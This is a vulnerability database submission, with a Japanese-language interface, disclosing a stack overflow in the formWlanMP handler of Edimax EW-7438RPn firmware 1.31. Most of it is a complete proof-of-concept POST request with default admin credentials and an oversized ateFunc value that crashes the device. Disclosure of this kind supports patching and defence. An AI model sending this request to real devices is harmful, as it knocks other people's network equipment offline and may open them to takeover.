提出 #813892: Edimax EW-7438RPn 1.31 Stack-based Buffer Overflow情報

タイトルEdimax EW-7438RPn 1.31 Stack-based Buffer Overflow
説明We found an stack overflow vulnerability in Edimax extender with firmware which was released recently, allows remote attackers to crash the server.In the router's formWlanMP function, ateFunc、ateGain、ateTxCount、ateChan、ateRate、ateMacID、e2pTxPower1、e2pTxPower2、e2pTxPower3、e2pTxPower4、e2pTxPower5、e2pTxPower6、e2pTxPower7、e2pTx2Power1、e2pTx2Power2、e2pTx2Power3、e2pTx2Power4、e2pTx2Power5、e2pTx2Power6、e2pTx2Power7、ateTxFreqOffset、ateMode、ateBW、ateAntenna、e2pTxFreqOffset、e2pTxPwDeltaB、e2pTxPwDeltaG、e2pTxPwDeltaMix、e2pTxPwDeltaN、readE2P、submit-url is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the ateFunc、ateGain、ateTxCount、ateChan、ateRate、ateMacID、e2pTxPower1、e2pTxPower2、e2pTxPower3、e2pTxPower4、e2pTxPower5、e2pTxPower6、e2pTxPower7、e2pTx2Power1、e2pTx2Power2、e2pTx2Power3、e2pTx2Power4、e2pTx2Power5、e2pTx2Power6、e2pTx2Power7、ateTxFreqOffset、ateMode、ateBW、ateAntenna、e2pTxFreqOffset、e2pTxPwDeltaB、e2pTxPwDeltaG、e2pTxPwDeltaMix、e2pTxPwDeltaN、readE2P、submit-url to execute arbitrary code. POST /goform/formWlanMP HTTP/1.1 Host: 192.168.0.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 2170 Origin: http://192.168.0.4 Authorization: Basic YWRtaW46MTIzNA== Connection: keep-alive Referer: http://192.168.0.4/wlanMP.asp Cookie: language=16 Upgrade-Insecure-Requests: 1 Priority: u=0, i submit-url=%2FwlanMP.asp&ateFunc=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ateGain=10&ateTxCount=200&ateChan=1&ateAntenna=1&ateMode=0&ateRate=3&ateTxFreqOffset=FF&e2pTxFreqOffset=FF&ateBW=1&e2pChan1=46&e2pTxPower1=0C0C&e2pChan2=48&e2pTxPower2=0C0C&e2pChan3=4A&e2pTxPower3=0C0C&e2pChan4=4C&e2pTxPower4=0C0C&e2pChan5=4E&e2pTxPower5=0C0C&e2pChan6=50&e2pTxPower6=0C0C&e2pChan7=52&e2pTxPower7=0C0C&e2pTx2Power1=0C0C&e2pTx2Power2=0C0C&e2pTx2Power3=0C0C&e2pTx2Power4=0C0C&e2pTx2Power5=0C0C&e2pTx2Power6=0C0C&e2pTx2Power7=0C0C&e2pTxPwDeltaB=FF&e2pTxPwDeltaG=FF&e2pTxPwDeltaN=FF&e2pTxPwDeltaMix=FFFF&readE2P=0C&e2pValue=
ソース⚠️ https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_8/8.md
ユーザー
 Bond_yes (UID 89043)
送信2026年04月27日 07:45 (1 月 ago)
モデレーション2026年05月24日 08:59 (27 days later)
ステータス承諾済み
VulDBエントリ365406 [Edimax EW-7438RPn 1.31 /goform/formWlanMP メモリ破損]
ポイント20

概要

Interested in the pricing of exploits?

See the underground prices here!